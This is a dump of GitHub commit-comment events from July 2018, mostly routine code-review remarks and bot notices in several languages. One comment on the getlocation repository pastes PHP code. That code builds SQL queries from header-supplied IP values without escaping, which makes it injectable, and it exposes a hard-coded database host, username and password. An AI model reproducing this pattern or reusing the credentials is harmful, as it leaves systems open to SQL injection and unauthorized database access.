{"id":"7965321154","type":"CommitCommentEvent","actor":{"login":"achilep"},"repo":{"name":"cabrelkemfang/Achile_Java"},"payload":{"comment":{"id":29707999,"position":null,"line":null,"path":null,"commit_id":"531a98342aa2e6b9ae66e8c1739f86230a93c61e","created_at":"2018-07-14T06:35:04Z","updated_at":"2018-07-14T06:35:04Z","author_association":"CONTRIBUTOR","body":"this chapter 3 and have one last exicise to submit for this chapter "}},"created_at":"2018-07-14T06:35:04Z"}
{"id":"7965322282","type":"CommitCommentEvent","actor":{"login":"Injabie3"},"repo":{"name":"SFUAnime/Red-DiscordBot"},"payload":{"comment":{"id":29708002,"position":null,"line":null,"path":null,"commit_id":"d2a90e7d7b2e4115a932047e104704e4fcbe4949","created_at":"2018-07-14T06:36:07Z","updated_at":"2018-07-14T06:36:07Z","author_association":"MEMBER","body":"Testing revealed changes needed for #67."}},"created_at":"2018-07-14T06:36:07Z"}
{"id":"7965322542","type":"CommitCommentEvent","actor":{"login":"Injabie3"},"repo":{"name":"SFUAnime/Red-DiscordBot"},"payload":{"comment":{"id":29708006,"position":null,"line":null,"path":null,"commit_id":"f6548246e35eae415fe39e3f6899a024135a6cfa","created_at":"2018-07-14T06:36:22Z","updated_at":"2018-07-14T06:36:22Z","author_association":"MEMBER","body":"Testing revealed changes needed for #67."}},"created_at":"2018-07-14T06:36:22Z"}
{"id":"7965323032","type":"CommitCommentEvent","actor":{"login":"filteraction"},"repo":{"name":"filteraction/user-panel-lite"},"payload":{"comment":{"id":29708011,"position":null,"line":null,"path":null,"commit_id":"9e2a6693f5420bb5559ae9f0d67f88951eb28186","created_at":"2018-07-14T06:36:52Z","updated_at":"2018-07-14T06:36:52Z","author_association":"OWNER","body":"**File modified**"}},"created_at":"2018-07-14T06:36:52Z"}
{"id":"7965324513","type":"CommitCommentEvent","actor":{"login":"halvadiya"},"repo":{"name":"halvadiya/getlocation"},"payload":{"comment":{"id":29708019,"position":2,"line":2,"path":".gitignore","commit_id":"a6341a511ecd7953300689707224f12f6e75537b","created_at":"2018-07-14T06:38:03Z","updated_at":"2018-07-14T06:38:03Z","author_association":"OWNER","body":"<?php\r\n//connect to database\r\n        class usersOnline {\r\n\r\n            \r\n            var $count = 0;\r\n            var $error;\r\n            var $i = 0;\r\n\r\n            function usersOnline () {\r\n                $this->timestamp = time();\r\n                $this->ip = $this->ipCheck();\r\n                $this->new_user();\r\n                $this->delete_user();\r\n                $this->count_users();\r\n                }\r\n\r\n            function ipCheck() {\r\n                if (getenv('HTTP_CLIENT_IP')) {\r\n                    $ip = getenv('HTTP_CLIENT_IP');\r\n                    }\r\n                elseif (getenv('HTTP_X_FORWARDED_FOR')) {\r\n                    $ip = getenv('HTTP_X_FORWARDED_FOR');\r\n                    }\r\n                elseif (getenv('HTTP_X_FORWARDED')) {\r\n                    $ip = getenv('HTTP_X_FORWARDED');\r\n                    }\r\n                elseif (getenv('HTTP_FORWARDED_FOR')) {\r\n                    $ip = getenv('HTTP_FORWARDED_FOR');\r\n                    }\r\n                elseif (getenv('HTTP_FORWARDED')) {\r\n                    $ip = getenv('HTTP_FORWARDED');\r\n                    }\r\n                else {\r\n                    $ip = $_SERVER['REMOTE_ADDR'];\r\n                    }\r\n                return $ip;\r\n                }\r\n            function new_user() {\r\n                $cekIP = \"SELECT ip FROM useronline WHERE ip='$this->ip'\";\r\n                $resultCekIp=mysql_query($cekIP);\r\n                $countCekIp=mysql_num_rows($resultCekIp);\r\n                if($countCekIp>0){\r\n                    $insert1 = mysql_query (\"UPDATE useronline SET timestamp='$this->timestamp', date=NOW(), ip='', distinct_ip='$this->ip'\");\r\n                    if (!$insert1) {\r\n                        $this->error[$this->i] = \"Unable to record new visitor\\r\\n\";            \r\n                        $this->i ++;\r\n                        }\r\n                    }\r\n                else{\r\n                    $insert2 = mysql_query (\"INSERT INTO useronline (timestamp, date, ip, distinct_ip) VALUES ('$this->timestamp',NOW(), '$this->ip', '$this->ip')\");\r\n                    if (!$insert2) {\r\n                        $this->error[$this->i] = \"Unable to record new visitor\\r\\n\";            \r\n                        $this->i ++;\r\n                        }\r\n                    }\r\n                }\r\n            function delete_user() {\r\n                $delete = mysql_query (\"DELETE FROM useronline WHERE timestamp < ($this->timestamp - $this->timeout)\");\r\n                if (!$delete) {\r\n                    $this->error[$this->i] = \"Unable to delete visitors\";\r\n                    $this->i ++;\r\n                    }\r\n                }\r\n            function count_users() {\r\n                if (count($this->error) == 0) {\r\n                    $count = mysql_num_rows ( mysql_query(\"SELECT DISTINCT ip FROM useronline\"));\r\n                    return $count;\r\n                    }\r\n                }\r\n            }\r\n        ?>\r\n        \r\n        \r\n        <?php\r\nerror_reporting(0);\r\n\t\t$link=mysql_connect(\"fdb17.biz.nf\",\"2398002_autentication\",\"craft@2710\") or die(\"Not found\");\r\n\t\tif(!$link)\r\n\t\t{\r\n\t\t\techo \"Error :- Server is not found !\".mysql_error();\r\n\t\t}\r\n\t\t$db=mysql_select_db(\"2398002_autentication\",$link);\r\n\t\tif(!$db)\r\n\t\t{\r\n\t\t\techo \"Error :- Database is not found !\".mysql_error();\r\n\t\t}\r\n\t\t\t\r\n?>"}},"created_at":"2018-07-14T06:38:03Z"}
{"id":"7965324931","type":"CommitCommentEvent","actor":{"login":"jean"},"repo":{"name":"surayt/wordcabin"},"payload":{"comment":{"id":29708021,"position":null,"line":null,"path":null,"commit_id":"fd166e43b53563b07901f7e7a67c784cf2cf9644","created_at":"2018-07-14T06:38:30Z","updated_at":"2018-07-14T06:38:30Z","author_association":"NONE","body":"Wow awesome, modern Aramaic online, I had no idea :-) "}},"created_at":"2018-07-14T06:38:30Z"}
{"id":"7965324964","type":"CommitCommentEvent","actor":{"login":"halvadiya"},"repo":{"name":"halvadiya/getlocation"},"payload":{"comment":{"id":29708022,"position":2,"line":2,"path":".gitignore","commit_id":"a6341a511ecd7953300689707224f12f6e75537b","created_at":"2018-07-14T06:38:32Z","updated_at":"2018-07-14T06:38:32Z","author_association":"OWNER","body":"Is it code work properly??\r\n"}},"created_at":"2018-07-14T06:38:32Z"}
{"id":"7965325439","type":"CommitCommentEvent","actor":{"login":"simrat39"},"repo":{"name":"simrat39/android_packages_apps_Settings"},"payload":{"comment":{"id":29708023,"position":null,"line":null,"path":null,"commit_id":"39e5278b8c9bbe60ef64a3319a8551bd8562a272","created_at":"2018-07-14T06:38:59Z","updated_at":"2018-07-14T06:38:59Z","author_association":"OWNER","body":"wtf"}},"created_at":"2018-07-14T06:38:59Z"}
{"id":"7965325552","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-smbc-bot"},"payload":{"comment":{"id":29708024,"position":null,"line":null,"path":null,"commit_id":"e2f3aac02fdc5067ba26c1999e560ae147fff4ef","created_at":"2018-07-14T06:39:06Z","updated_at":"2018-07-14T06:39:06Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/59483139-581b-420d-90f0-d1a4f85c757d?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-smbc-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/60053b78-cf64-42ea-8ce3-3ba3ce629cf0?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-smbc-bot\") deployed [watsonwork-smbc-bot](https://github.com/WilliamHolmes/watsonwork-smbc-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180714-063905 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180714-063905\") to [dev](https://console.bluemix.net/apps/614b28c8-bbda-4a4b-b0da-a51b1e3ed64a?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-14T06:39:06Z"}
{"id":"7965326219","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29708025,"position":null,"line":null,"path":null,"commit_id":"bee0b95c2d0f52152e7534d046e7d375651d0ca9","created_at":"2018-07-14T06:39:46Z","updated_at":"2018-07-14T06:39:46Z","author_association":"NONE","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/bee0b95c2d0f52152e7534d046e7d375651d0ca9#commitcomment-29707626) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/73c385f4c56ff0c4a27a64b71787e3217f005534/daily_2018_7_14/report.md). cc @ararslan"}},"created_at":"2018-07-14T06:39:46Z"}
{"id":"7965326446","type":"CommitCommentEvent","actor":{"login":"igorpecovnik"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29708027,"position":null,"line":null,"path":null,"commit_id":"556b3067086266dd264e3f5e2dcdf61b60468d27","created_at":"2018-07-14T06:39:58Z","updated_at":"2018-07-14T06:39:58Z","author_association":"MEMBER","body":"Move things rather to branch sunxi-4.18, NEXT = 4.17.y atm and DEV = master branch with nothing going on."}},"created_at":"2018-07-14T06:39:58Z"}
{"id":"7965327231","type":"CommitCommentEvent","actor":{"login":"ilyasiba"},"repo":{"name":"IharVypau/or-2"},"payload":{"comment":{"id":29708028,"position":15,"line":15,"path":"eleventhLesson/script.js","commit_id":"50cea62698c5fb175fd6fdb172bb7aac9b36db07","created_at":"2018-07-14T06:40:36Z","updated_at":"2018-07-14T06:40:36Z","author_association":"NONE","body":"Игорь я в общем не понимаю зачем проверка на длину массива. Мы меняем\r\nэлемент на другой, длина никогда не изменится\r\n\r\nсб, 14 июля 2018 г. в 9:30, IharVypau <notifications@github.com>:\r\n\r\n> Ты прав, тут небольшая ошибка, правильно было бы arr.join('').length ==\r\n> outputArr.join('').length\r\n>\r\n> —\r\n> You are receiving this because you commented.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/IharVypau/or-2/commit/50cea62698c5fb175fd6fdb172bb7aac9b36db07#commitcomment-29707979>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/Al3ZVq5WWpW1KNti3emwL_kP0G132tzKks5uGZAIgaJpZM4VPg3X>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-14T06:40:36Z"}
{"id":"7965329138","type":"CommitCommentEvent","actor":{"login":"SilenceAllen"},"repo":{"name":"SilenceAllen/VideoShareSystem"},"payload":{"comment":{"id":29708031,"position":null,"line":null,"path":null,"commit_id":"2aeedd665dddab8ad169dc31263b60341956253a","created_at":"2018-07-14T06:42:17Z","updated_at":"2018-07-14T06:42:17Z","author_association":"OWNER","body":"人"}},"created_at":"2018-07-14T06:42:17Z"}
{"id":"7965332273","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29708040,"position":47,"line":99,"path":"Dodo.Tests/BoardsControllerTests.cs","commit_id":"3956fcb4517456bc842cc506cc777a4a728d7f05","created_at":"2018-07-14T06:44:52Z","updated_at":"2018-07-14T06:44:52Z","author_association":"MEMBER","body":"Я бы вместо First написал Single - так сильнее.\r\nНо это маленькое замечание, готов принять и так."}},"created_at":"2018-07-14T06:44:52Z"}
{"id":"7965334015","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29708050,"position":null,"line":null,"path":null,"commit_id":"3956fcb4517456bc842cc506cc777a4a728d7f05","created_at":"2018-07-14T06:46:28Z","updated_at":"2018-07-14T06:46:28Z","author_association":"MEMBER","body":"Зачет, поздравляю"}},"created_at":"2018-07-14T06:46:28Z"}
{"id":"7965335489","type":"CommitCommentEvent","actor":{"login":"Y1ran"},"repo":{"name":"Y1ran/Free-VPN-for-Coursera"},"payload":{"comment":{"id":29708051,"position":null,"line":null,"path":null,"commit_id":"c3ac9b4532d7fe6debf91c1db561a4ceb1d6a2f2","created_at":"2018-07-14T06:47:49Z","updated_at":"2018-07-14T06:47:49Z","author_association":"OWNER","body":"已更新\n\n2018-07-11 13:02 GMT+08:00 yanyueding <notifications@github.com>:\n\n> 新SSR的新节点又被墙了。。。昨天还可以用的，求跟新\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Y1ran/Free-VPN-for-Coursera/commit/c3ac9b4532d7fe6debf91c1db561a4ceb1d6a2f2#commitcomment-29666084>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AXLcHCO9yvNxM1Mei8GCn_Sxhg231W-Vks5uFYbUgaJpZM4VKfmb>\n> .\n>\n"}},"created_at":"2018-07-14T06:47:49Z"}
{"id":"7965335795","type":"CommitCommentEvent","actor":{"login":"MichaelMackus"},"repo":{"name":"MichaelMackus/simplerl"},"payload":{"comment":{"id":29708053,"position":5,"line":35,"path":"message.c","commit_id":"d4b8bab7ac9bafac6e48111c81195be1b0e2b904","created_at":"2018-07-14T06:48:08Z","updated_at":"2018-07-14T06:48:08Z","author_association":"OWNER","body":"Includes memory for null byte character (which is why its length + 1)."}},"created_at":"2018-07-14T06:48:08Z"}
{"id":"7965335840","type":"CommitCommentEvent","actor":{"login":"IharVypau"},"repo":{"name":"IharVypau/or-2"},"payload":{"comment":{"id":29708054,"position":15,"line":15,"path":"eleventhLesson/script.js","commit_id":"50cea62698c5fb175fd6fdb172bb7aac9b36db07","created_at":"2018-07-14T06:48:10Z","updated_at":"2018-07-14T06:48:10Z","author_association":"OWNER","body":"Проверка только для того, чтобы сделать первоначальную проверку редактировался массив или нет, возможно можно было просто написать arr.join('')===outputArr.join('') но я не проверял такой вариант\r\n"}},"created_at":"2018-07-14T06:48:10Z"}
{"id":"7965336689","type":"CommitCommentEvent","actor":{"login":"xchuan93"},"repo":{"name":"wireapp/cryptobox-c"},"payload":{"comment":{"id":29708057,"position":null,"line":null,"path":null,"commit_id":"0bc1b76286daf6320ea578ead5836d1c3d432a7a","created_at":"2018-07-14T06:48:57Z","updated_at":"2018-07-14T06:48:57Z","author_association":"NONE","body":"char * encrypt_data_basics(CBox * alice_box, CBox * bob_box,char const * data_byte){\r\n    \r\n    CBoxResult rc = CBOX_SUCCESS;\r\n    CBoxVec * bob_prekey = NULL;\r\n    rc = cbox_new_prekey(bob_box, 1, &bob_prekey);\r\n    assert(rc == CBOX_SUCCESS);\r\n    \r\n    CBoxSession * alice = NULL;\r\n    rc = cbox_session_init_from_prekey(alice_box, \"a2398474bbe5185d\", cbox_vec_data(bob_prekey), cbox_vec_len(bob_prekey), &alice);\r\n    assert(rc == CBOX_SUCCESS);\r\n    char const * hello_bob = data_byte;\r\n    size_t hello_bob_len = strlen(hello_bob);\r\n    CBoxVec * cipher = NULL;\r\n    rc = cbox_encrypt(alice, (uint8_t const *) hello_bob, hello_bob_len, &cipher);\r\n    cbox_session_close(alice);\r\n    \r\n    CBoxVec *plain = NULL;\r\n    char alice_tmp[] = \"/tmp/alice11XXXXXX\";\r\n    char * alice_dir = mkdtemp(alice_tmp);\r\n    assert(alice_dir != NULL);\r\n    CBox * alice_box1 = NULL;\r\n    rc = cbox_file_open(alice_dir, &alice_box1);\r\n    \r\n    CBoxSession * alice1 = NULL;\r\n    rc = cbox_session_init_from_message(alice_box1, \"a2398474bbe5185d\", cbox_vec_data(cipher), cbox_vec_len(cipher), &alice1, &plain);\r\n    \r\n//    rc = cbox_decrypt(alice1, cbox_vec_data(cipher), cbox_vec_len(cipher), &plain);\r\n    \r\n    print_hex(cbox_vec_data(plain), cbox_vec_len(plain));\r\n    \r\n    \r\n    NSData *data1 = [NSData dataWithBytes:cbox_vec_data(cipher) length:cbox_vec_len(cipher)];\r\n    \r\n    NSString *str = [data1 base64EncodedStringWithOptions:0];\r\n    \r\n    \r\n    return cbox_vec_data(cipher);\r\n}\r\n\r\nthis is my code ,when i decrypt the `alice1 and plain ` is NULL and ERROR: CBoxError: proteus error: RemoteIdentityChanged why?\r\n\r\n> alice1"}},"created_at":"2018-07-14T06:48:57Z"}
{"id":"7965336690","type":"CommitCommentEvent","actor":{"login":"Abrarobe"},"repo":{"name":"mohammadtoufiqachmad/simrs-v2"},"payload":{"comment":{"id":29708058,"position":null,"line":null,"path":null,"commit_id":"503a508328a76878e7ddd41ef70744e550e58dd8","created_at":"2018-07-14T06:48:57Z","updated_at":"2018-07-14T06:48:57Z","author_association":"COLLABORATOR","body":"[\r\n    {\r\n        \"id\": 0,\r\n        \"name\": \"Item 0\",\r\n        \"price\": \"$0\"\r\n    },\r\n    {\r\n        \"id\": 1,\r\n        \"name\": \"Item 1\",\r\n        \"price\": \"$1\"\r\n    },\r\n    {\r\n        \"id\": 2,\r\n        \"name\": \"Item 2\",\r\n        \"price\": \"$2\"\r\n    },\r\n    {\r\n        \"id\": 3,\r\n        \"name\": \"Item 3\",\r\n        \"price\": \"$3\"\r\n    },\r\n    {\r\n        \"id\": 4,\r\n        \"name\": \"Item 4\",\r\n        \"price\": \"$4\"\r\n    },\r\n    {\r\n        \"id\": 5,\r\n        \"name\": \"Item 5\",\r\n        \"price\": \"$5\"\r\n    },\r\n    {\r\n        \"id\": 6,\r\n        \"name\": \"Item 6\",\r\n        \"price\": \"$6\"\r\n    },\r\n    {\r\n        \"id\": 7,\r\n        \"name\": \"Item 7\",\r\n        \"price\": \"$7\"\r\n    },\r\n    {\r\n        \"id\": 8,\r\n        \"name\": \"Item 8\",\r\n        \"price\": \"$8\"\r\n    },\r\n    {\r\n        \"id\": 9,\r\n        \"name\": \"Item 9\",\r\n        \"price\": \"$9\"\r\n    },\r\n    {\r\n        \"id\": 10,\r\n        \"name\": \"Item 10\",\r\n        \"price\": \"$10\"\r\n    },\r\n    {\r\n        \"id\": 11,\r\n        \"name\": \"Item 11\",\r\n        \"price\": \"$11\"\r\n    },\r\n    {\r\n        \"id\": 12,\r\n        \"name\": \"Item 12\",\r\n        \"price\": \"$12\"\r\n    },\r\n    {\r\n        \"id\": 13,\r\n        \"name\": \"Item 13\",\r\n        \"price\": \"$13\"\r\n    },\r\n    {\r\n        \"id\": 14,\r\n        \"name\": \"Item 14\",\r\n        \"price\": \"$14\"\r\n    },\r\n    {\r\n        \"id\": 15,\r\n        \"name\": \"Item 15\",\r\n        \"price\": \"$15\"\r\n    },\r\n    {\r\n        \"id\": 16,\r\n        \"name\": \"Item 16\",\r\n        \"price\": \"$16\"\r\n    },\r\n    {\r\n        \"id\": 17,\r\n        \"name\": \"Item 17\",\r\n        \"price\": \"$17\"\r\n    },\r\n    {\r\n        \"id\": 18,\r\n        \"name\": \"Item 18\",\r\n        \"price\": \"$18\"\r\n    },\r\n    {\r\n        \"id\": 19,\r\n        \"name\": \"Item 19\",\r\n        \"price\": \"$19\"\r\n    },\r\n    {\r\n        \"id\": 20,\r\n        \"name\": \"Item 20\",\r\n        \"price\": \"$20\"\r\n    }\r\n]"}},"created_at":"2018-07-14T06:48:57Z"}
{"id":"7965340261","type":"CommitCommentEvent","actor":{"login":"Synchro"},"repo":{"name":"PHPMailer/PHPMailer"},"payload":{"comment":{"id":29708061,"position":43,"line":1079,"path":"src/SMTP.php","commit_id":"f4d37028af4b2f596847534566344b21d9b48b0d","created_at":"2018-07-14T06:52:17Z","updated_at":"2018-07-14T06:52:17Z","author_association":"MEMBER","body":"This was changed to deal with a situation where PHP could hang up completely. As the error says, that’s a problem with your specific build & environment, not PHP in general. Is your system/script particularly busy to have so many descriptors open? I usually see numbers like 4 in here, not 1222."}},"created_at":"2018-07-14T06:52:17Z"}
{"id":"7965343464","type":"CommitCommentEvent","actor":{"login":"KwonGiho"},"repo":{"name":"donghyunele/SpringBasic"},"payload":{"comment":{"id":29708067,"position":23,"line":23,"path":"src/main/java/com/example/basic/DAO/BoardMapper.java","commit_id":"37c1564b0fa6707e4232a32ad33613321e0cbf99","created_at":"2018-07-14T06:55:21Z","updated_at":"2018-07-14T06:55:21Z","author_association":"NONE","body":"순서를 정해주고나서 values를 적는걸 추천드립니당"}},"created_at":"2018-07-14T06:55:21Z"}
{"id":"7965343983","type":"CommitCommentEvent","actor":{"login":"KwonGiho"},"repo":{"name":"donghyunele/SpringBasic"},"payload":{"comment":{"id":29708068,"position":41,"line":38,"path":"src/main/java/com/example/basic/controller/BoardController.java","commit_id":"37c1564b0fa6707e4232a32ad33613321e0cbf99","created_at":"2018-07-14T06:55:54Z","updated_at":"2018-07-14T06:55:54Z","author_association":"NONE","body":"redirect와 disdpatcher의 차이점을 아시나요 ?"}},"created_at":"2018-07-14T06:55:54Z"}
{"id":"7965349332","type":"CommitCommentEvent","actor":{"login":"Jason0214"},"repo":{"name":"Armour/Jarvis"},"payload":{"comment":{"id":29708084,"position":4,"line":41,"path":"README.md","commit_id":"0c354d249e8e69252647c6f1dc506edcbe3c067e","created_at":"2018-07-14T07:00:38Z","updated_at":"2018-07-14T07:00:38Z","author_association":"NONE","body":"👍"}},"created_at":"2018-07-14T07:00:38Z"}
{"id":"7965351685","type":"CommitCommentEvent","actor":{"login":"clason"},"repo":{"name":"ncm2/ncm2"},"payload":{"comment":{"id":29708091,"position":null,"line":null,"path":null,"commit_id":"22d80bc0b93c942eeb07d9c5cbd2ae6927d3cd64","created_at":"2018-07-14T07:02:29Z","updated_at":"2018-07-14T07:02:29Z","author_association":"NONE","body":"Should I open a proper issue for this? "}},"created_at":"2018-07-14T07:02:29Z"}
{"id":"7965351728","type":"CommitCommentEvent","actor":{"login":"ruslanstufetulovs"},"repo":{"name":"Dmitrijs1984/SquareCalculator"},"payload":{"comment":{"id":29708092,"position":1,"line":1,"path":".idea/description.html","commit_id":"6395075651404476b2ec9a8bcbecc78dfddd8894","created_at":"2018-07-14T07:02:31Z","updated_at":"2018-07-14T07:02:31Z","author_association":"NONE","body":"В проекте можно добавить gitignore, чтобы файлы из папки .idea не коммитить в гит"}},"created_at":"2018-07-14T07:02:31Z"}
{"id":"7965352568","type":"CommitCommentEvent","actor":{"login":"ruslanstufetulovs"},"repo":{"name":"Dmitrijs1984/SquareCalculator"},"payload":{"comment":{"id":29708093,"position":7,"line":7,"path":"SquareCalculator.java","commit_id":"6395075651404476b2ec9a8bcbecc78dfddd8894","created_at":"2018-07-14T07:03:14Z","updated_at":"2018-07-14T07:03:14Z","author_association":"NONE","body":"форматируйте код, в IntelliJ IDEA это CTRL+ALT+L"}},"created_at":"2018-07-14T07:03:14Z"}
{"id":"7965353197","type":"CommitCommentEvent","actor":{"login":"ruslanstufetulovs"},"repo":{"name":"Dmitrijs1984/SquareCalculator"},"payload":{"comment":{"id":29708098,"position":12,"line":12,"path":"SquareCalculatorDemo.java","commit_id":"6395075651404476b2ec9a8bcbecc78dfddd8894","created_at":"2018-07-14T07:03:47Z","updated_at":"2018-07-14T07:03:47Z","author_association":"NONE","body":"форматируйте код"}},"created_at":"2018-07-14T07:03:47Z"}
{"id":"7965353936","type":"CommitCommentEvent","actor":{"login":"ChrispsL"},"repo":{"name":"CNHCircleK/Online-MRF"},"payload":{"comment":{"id":29708100,"position":null,"line":null,"path":null,"commit_id":"82da4ea3693124dcc0a17af3c7f7ead532226d3e","created_at":"2018-07-14T07:04:27Z","updated_at":"2018-07-14T07:04:27Z","author_association":"COLLABORATOR","body":"Massive code refactorizing, it's cleaner now"}},"created_at":"2018-07-14T07:04:27Z"}
{"id":"7965354563","type":"CommitCommentEvent","actor":{"login":"time-killer-games"},"repo":{"name":"enigma-dev/enigma-dev"},"payload":{"comment":{"id":29708102,"position":null,"line":null,"path":null,"commit_id":"d3d5122ff21d8b06b65e0c8bc1d63a57feac1d14","created_at":"2018-07-14T07:04:58Z","updated_at":"2018-07-14T07:04:58Z","author_association":"CONTRIBUTOR","body":"This doesn't support UTF-8. So guess what happens when you put your game in a folder with Russian characters in the pathname? The game will throw that error of yours and the game will do what the errors says and \"not open\"."}},"created_at":"2018-07-14T07:04:58Z"}
{"id":"7965354970","type":"CommitCommentEvent","actor":{"login":"ruslanstufetulovs"},"repo":{"name":"Dmitrijs1984/SquareCalculator"},"payload":{"comment":{"id":29708103,"position":1,"line":1,"path":"SquareCalculator.java","commit_id":"6395075651404476b2ec9a8bcbecc78dfddd8894","created_at":"2018-07-14T07:05:19Z","updated_at":"2018-07-14T07:05:19Z","author_association":"NONE","body":"названия package должны быть написаны маленькими буквами"}},"created_at":"2018-07-14T07:05:19Z"}
{"id":"7965355432","type":"CommitCommentEvent","actor":{"login":"time-killer-games"},"repo":{"name":"enigma-dev/enigma-dev"},"payload":{"comment":{"id":29708105,"position":null,"line":null,"path":null,"commit_id":"d3d5122ff21d8b06b65e0c8bc1d63a57feac1d14","created_at":"2018-07-14T07:05:41Z","updated_at":"2018-07-14T07:05:41Z","author_association":"CONTRIBUTOR","body":"A lot of people live in Russia, too."}},"created_at":"2018-07-14T07:05:41Z"}
{"id":"7965355738","type":"CommitCommentEvent","actor":{"login":"ruslanstufetulovs"},"repo":{"name":"Dmitrijs1984/SquareCalculator"},"payload":{"comment":{"id":29708108,"position":8,"line":8,"path":"src/SquareCalc/SquareCalculator.java","commit_id":"6395075651404476b2ec9a8bcbecc78dfddd8894","created_at":"2018-07-14T07:05:57Z","updated_at":"2018-07-14T07:05:57Z","author_association":"NONE","body":"дубликаты файлов лучше удалить"}},"created_at":"2018-07-14T07:05:57Z"}
{"id":"7965355902","type":"CommitCommentEvent","actor":{"login":"time-killer-games"},"repo":{"name":"enigma-dev/enigma-dev"},"payload":{"comment":{"id":29708109,"position":null,"line":null,"path":null,"commit_id":"d3d5122ff21d8b06b65e0c8bc1d63a57feac1d14","created_at":"2018-07-14T07:06:06Z","updated_at":"2018-07-14T07:06:06Z","author_association":"CONTRIBUTOR","body":"I mean look at that landmass "}},"created_at":"2018-07-14T07:06:06Z"}
{"id":"7965356570","type":"CommitCommentEvent","actor":{"login":"roxma"},"repo":{"name":"ncm2/ncm2"},"payload":{"comment":{"id":29708112,"position":null,"line":null,"path":null,"commit_id":"22d80bc0b93c942eeb07d9c5cbd2ae6927d3cd64","created_at":"2018-07-14T07:06:38Z","updated_at":"2018-07-14T07:06:38Z","author_association":"MEMBER","body":"@clason \r\n\r\nPlease open a proper issue.\r\n\r\nI cannot reproduce the issue you mentioned."}},"created_at":"2018-07-14T07:06:38Z"}
{"id":"7965356728","type":"CommitCommentEvent","actor":{"login":"time-killer-games"},"repo":{"name":"enigma-dev/enigma-dev"},"payload":{"comment":{"id":29708113,"position":null,"line":null,"path":null,"commit_id":"d3d5122ff21d8b06b65e0c8bc1d63a57feac1d14","created_at":"2018-07-14T07:06:46Z","updated_at":"2018-07-14T07:06:46Z","author_association":"CONTRIBUTOR","body":"The population must be like India x 1 million"}},"created_at":"2018-07-14T07:06:46Z"}
{"id":"7965357641","type":"CommitCommentEvent","actor":{"login":"time-killer-games"},"repo":{"name":"enigma-dev/enigma-dev"},"payload":{"comment":{"id":29708116,"position":null,"line":null,"path":null,"commit_id":"d3d5122ff21d8b06b65e0c8bc1d63a57feac1d14","created_at":"2018-07-14T07:07:35Z","updated_at":"2018-07-14T07:07:35Z","author_association":"CONTRIBUTOR","body":"And everyone knows India is has the highest country population in the world"}},"created_at":"2018-07-14T07:07:35Z"}
{"id":"7965357706","type":"CommitCommentEvent","actor":{"login":"ruslanstufetulovs"},"repo":{"name":"Dmitrijs1984/RandomAndSum"},"payload":{"comment":{"id":29708117,"position":1,"line":1,"path":".idea/description.html","commit_id":"c04ac435cdcf0d34215da73018551790f8b0305e","created_at":"2018-07-14T07:07:38Z","updated_at":"2018-07-14T07:07:38Z","author_association":"NONE","body":"Тоже самое. Пример gitignore можно взять из нашего проекта на практиках"}},"created_at":"2018-07-14T07:07:38Z"}
{"id":"7965358428","type":"CommitCommentEvent","actor":{"login":"ruslanstufetulovs"},"repo":{"name":"Dmitrijs1984/RandomAndSum"},"payload":{"comment":{"id":29708120,"position":4,"line":4,"path":"src/com/Calculator.java","commit_id":"c04ac435cdcf0d34215da73018551790f8b0305e","created_at":"2018-07-14T07:08:15Z","updated_at":"2018-07-14T07:08:15Z","author_association":"NONE","body":"в названиях лучше не использовать цифры"}},"created_at":"2018-07-14T07:08:15Z"}
{"id":"7965358829","type":"CommitCommentEvent","actor":{"login":"time-killer-games"},"repo":{"name":"enigma-dev/enigma-dev"},"payload":{"comment":{"id":29708121,"position":null,"line":null,"path":null,"commit_id":"d3d5122ff21d8b06b65e0c8bc1d63a57feac1d14","created_at":"2018-07-14T07:08:37Z","updated_at":"2018-07-14T07:08:37Z","author_association":"CONTRIBUTOR","body":"So I cant even imagine how much mors we have to worry about Russia hacking into the ENIGMA servers now"}},"created_at":"2018-07-14T07:08:37Z"}
{"id":"7965359361","type":"CommitCommentEvent","actor":{"login":"time-killer-games"},"repo":{"name":"enigma-dev/enigma-dev"},"payload":{"comment":{"id":29708124,"position":null,"line":null,"path":null,"commit_id":"d3d5122ff21d8b06b65e0c8bc1d63a57feac1d14","created_at":"2018-07-14T07:09:06Z","updated_at":"2018-07-14T07:09:06Z","author_association":"CONTRIBUTOR","body":"Review my pr"}},"created_at":"2018-07-14T07:09:06Z"}
{"id":"7965359846","type":"CommitCommentEvent","actor":{"login":"ruslanstufetulovs"},"repo":{"name":"Dmitrijs1984/RandomAndSum"},"payload":{"comment":{"id":29708127,"position":11,"line":11,"path":"src/com/RandomNumbersDemo.java","commit_id":"c04ac435cdcf0d34215da73018551790f8b0305e","created_at":"2018-07-14T07:09:33Z","updated_at":"2018-07-14T07:09:33Z","author_association":"NONE","body":"нет необходимости создавать 2 сканнера"}},"created_at":"2018-07-14T07:09:33Z"}
